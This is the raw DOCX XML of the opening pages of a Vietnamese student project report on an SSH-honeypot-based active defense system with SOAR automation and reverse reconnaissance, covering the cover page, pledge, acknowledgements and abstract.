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pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000002">
      <w:pPr>
        <w:spacing w:after="0" w:before="240" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HỌC VIỆN CÔNG NGHỆ BƯU CHÍNH VIỄN THÔNG</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000003">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">KHOA AN TOÀN THÔNG TIN</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000004">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sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="742950" cy="742950"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1701586920" name="image8.jpg"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image8.jpg"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="74295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B">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C">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after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">BÁO CÁO BÀI TẬP LỚN</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HỌC PHẦN: HỆ ĐIỀU HÀNH WINDOWS VÀ LINUX/UNIX</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MÃ HỌC PHẦN: INT1487</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000010">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1">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2">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3">
      <w:pPr>
        <w:spacing w:after="0" w:before="120" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ĐỀ TÀI: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HỆ THỐNG PHÒNG THỦ CHỦ ĐỘNG (ACTIVE DEFENSE) KẾT HỢP SSH HONEYPOT, TỰ ĐỘNG HÓA PHẢN ỨNG SỰ CỐ VÀ TRINH SÁT NGƯỢC KẺ TẤN CÔNG</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000014">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000015">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Họ và tên</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">:</w:t>
        <w:tab/>
        <w:t xml:space="preserve">NGUYỄN GIA HÀO</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000016">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="720"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Mã sinh viên</w:t>
        <w:tab/>
        <w:t xml:space="preserve">:</w:t>
        <w:tab/>
        <w:t xml:space="preserve">B24DCAT088 </w:t>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000017">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tên lớp</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">: </w:t>
        <w:tab/>
        <w:t xml:space="preserve">INT1487-20261-03</w:t>
        <w:tab/>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sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Giảng viên hướng dẫn: Quản Trọng Thế</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:sectPr>
          <w:headerReference r:id="rId8" w:type="default"/>
          <w:footerReference r:id="rId9" w:type="default"/>
          <w:pgSz w:h="16838" w:w="11906" w:orient="portrait"/>
          <w:pgMar w:bottom="1134" w:top="1134" w:left="1418" w:right="1021" w:header="709" w:footer="454"/>
          <w:pgNumType w:start="1"/>
        </w:sectPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HÀ NỘI 2026</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001F">
      <w:pPr>
        <w:spacing w:after="600" w:before="400" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000020">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LỜI CAM ĐOAN</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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Tôi xin cam đoan bản báo cáo đồ án với đề tài: 'Nghiên cứu, Thiết kế và Triển khai Hệ thống Phòng thủ Chủ động (Active Defense) kết hợp SSH Honeypot (Cowrie), Tự động hóa Phản ứng sự cố (SOAR) và Trinh sát ngược Kẻ tấn công' là công trình nghiên cứu và phát triển nghiêm túc của cá nhân tôi dưới sự định hướng, hướng dẫn của Giảng viên hướng dẫn.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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Toàn bộ hệ thống mã nguồn bao gồm Động cơ tương quan sự kiện an ninh (Correlation Engine), Phân hệ trinh sát ngược (Reverse Intelligence), Phân hệ bẫy mồi Honeytoken và khử ẩn danh (Active De-anonymization), Phân hệ phân tích mã độc tĩnh (Malware Analyzer) và Bot SOAR Telegram tương tác 2 chiều đều được tự nghiên cứu, thiết kế kiến trúc và lập trình bằng ngôn ngữ Python, không sao chép nguyên mẫu từ bất kỳ công trình hoặc đồ án nào khác.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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Các tài liệu, số liệu tham khảo và trích dẫn trong đồ án được ghi chú nguồn gốc rõ ràng, tuân thủ đúng quy định về liêm chính học thuật. Tôi xin chịu hoàn toàn trách nhiệm trước Hội đồng Đánh giá nếu có bất kỳ sự thiếu trung thực nào xảy ra.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000024">
      <w:pPr>
        <w:spacing w:after="600" w:before="400" w:lineRule="auto"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sinh viên thực hiện</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">(Ký và ghi rõ họ tên)</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">[Họ và tên sinh viên]</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000025">
      <w:pPr>
        <w:keepNext w:val="1"/>
        <w:spacing w:before="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="00336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6">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LỜI CẢM ƠN</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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hoàn thành đồ án này một cách trọn vẹn và đạt được kết quả nghiên cứu có tính thực tiễn cao, tôi xin bày tỏ lòng biết ơn sâu sắc và chân thành nhất tới các Thầy/Cô giáo trong Khoa An toàn Thông tin &amp; Mạng Máy tính đã tận tình truyền đạt những nền tảng kiến thức chuyên môn quý báu trong suốt quá trình học tập.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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Đặc biệt, tôi xin gửi lời cảm ơn sâu sắc nhất tới Giảng viên hướng dẫn. Thầy đã đưa ra những lời góp ý mang tính bước ngoặt, thẳng thắn chỉ ra rằng 'việc chỉ cài đặt một ứng dụng Honeypot có sẵn và lập trình gửi tin nhắn thông báo cơ bản chỉ là mức ứng dụng người dùng, thiếu hàm lượng khoa học và kỹ thuật chuyên sâu'. Chính lời nhận xét mang tính xây dựng đó đã là động lực to lớn giúp tôi thay đổi hoàn toàn cách tiếp cận, không dừng lại ở việc áp dụng công cụ bề nổi mà đi sâu vào nghiên cứu bản chất kiến trúc phòng thủ chủ động, thiết kế thuật toán tương quan TTPs theo MITRE ATT&amp;CK, phát triển cơ chế trinh sát ngược (Reverse OSINT), bẫy mồi Honeytokens và xây dựng một hệ sinh thái SOAR Mini-SOC tự động hóa phản ứng toàn diện.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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Cuối cùng, tôi xin chân thành cảm ơn gia đình, bạn bè và các đồng nghiệp đã luôn ủng hộ, tạo điều kiện tốt nhất về tinh thần và môi trường nghiên cứu trong suốt thời gian thực hiện đề tài này.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002A">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B">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TÓM TẮT ĐỒ ÁN</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="1e1e1e"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Trong bối cảnh các cuộc tấn công không gian mạng ngày càng gia tăng về mức độ tinh vi và tần suất, đặc biệt là các cuộc tấn công tự động từ các mạng máy tính ma (Botnet) nhắm vào dịch vụ điều khiển từ xa SSH/Telnet, các giải pháp phòng thủ thụ động truyền thống (như tường lửa tĩnh, hệ thống IDS/IPS thông thường) dần bộc lộ nhiều điểm nghẽn nghiêm trọng: độ trễ phát hiện cao, thiếu khả năng phân loại động cơ đối thủ và hoàn toàn bị động trong việc ngăn chặn các đợt rà quét tự động tốc độ cao. Mặc dù công nghệ bẫy Honeypot (điển hình là Cowrie) đã chứng minh được hiệu quả trong việc thu thập hành vi tấn công, nhưng việc dừng lại ở mức cài đặt phần mềm và gửi thông báo thụ động chỉ mang tính chất thống kê đơn thuần, chưa thể hiện được giá trị tác chiến và kỹ thuật công nghệ thông tin chuyên sâu.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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Đề tài này đề xuất và hiện thực hóa một kiến trúc hệ thống Phòng thủ Chủ động (Active Defense &amp; Deception Ecosystem) kết hợp Honeypot SSH với Tự động hóa Phản ứng Sự cố (SOAR) và Trinh sát ngược Kẻ tấn công (Reverse Reconnaissance). Hệ thống được xây dựng trên mô hình 5 phân lớp hoàn chỉnh, tự phát triển bằng ngôn ngữ Python: (1) Phân hệ Thu thập &amp; Phân tích Sự kiện thời gian thực từ Cowrie; (2) Động cơ Tương quan Sự kiện thông minh ánh xạ tự động các hành vi xâm nhập sang ma trận TTPs chuẩn MITRE ATT&amp;CK (như T1110.001 Brute Force, T1078 Valid Accounts, T1105 Ingress Tool Transfer, T1552 Honeytoken Access); (3) Phân hệ Trinh sát ngược (Reverse Intelligence) tự động thu thập OSINT từ AbuseIPDB, Shodan API, tọa độ GeoIP và kỹ thuật quét cổng an toàn; (4) Phân hệ Bẫy mồi Honeytokens khử ẩn danh (De-anonymization) gài các tài liệu bí mật mồi để lật tẩy IP thật của kẻ tấn công ngay cả khi đối phương sử dụng Proxy/VPN; (5) Phân hệ Phân tích Mã độc tự động trích xuất IOCs và tra cứu VirusTotal; (6) Động cơ Thực thi SOAR hỗ trợ chặn tường lửa động và kỹ thuật giam lỏng Tarpitting (làm nghẽn luồng tài nguyên của attacker); cùng một Telegram SOAR Bot tương tác 2 chiều cho phép chuyên viên SOC ra quyết định tức thì thông qua bàn phím Inline Buttons.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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Kết quả thực nghiệm trên môi trường Lab mô phỏng đa kịch bản và môi trường mạng Internet thực tế cho thấy hệ thống đã rút ngắn thời gian phản ứng trung bình từ 15-20 phút (thao tác thủ công) xuống chỉ còn 1.8 - 2.5 giây (tự động hóa SOAR), giảm thiểu 98% áp lực tải của các đợt tấn công brute-force nhờ cơ chế Tarpitting, đồng thời nâng cao độ chính xác trong việc định danh và lập hồ sơ mối đe dọa (Attacker Profiling). Đề tài khẳng định bước chuyển dịch vượt bậc từ mô hình triển khai ứng dụng bề nổi sang một giải pháp kỹ thuật an ninh mạng chủ động, có tính học thuật cao và khả năng áp dụng thực tiễn trong các trung tâm điều hành an ninh mạng (SOC) quy mô vừa và nhỏ.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002E">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DANH MỤC THUẬT NGỮ VÀ TỪ VIẾT TẮT</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000030">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0.1: Bảng giải nghĩa các thuật ngữ viết tắt trong đồ án</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table1"/>
        <w:tblW w:w="94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4"/>
        <w:gridCol w:w="3134"/>
        <w:gridCol w:w="3134"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="3134"/>
            <w:gridCol w:w="3134"/>
            <w:gridCol w:w="3134"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1f497d" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000031">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Thuật ngữ</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1f497d" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000032">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Tên đầy đủ tiếng Anh</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1f497d" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000033">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Ý nghĩa / Diễn giải tiếng Việt</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000034">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
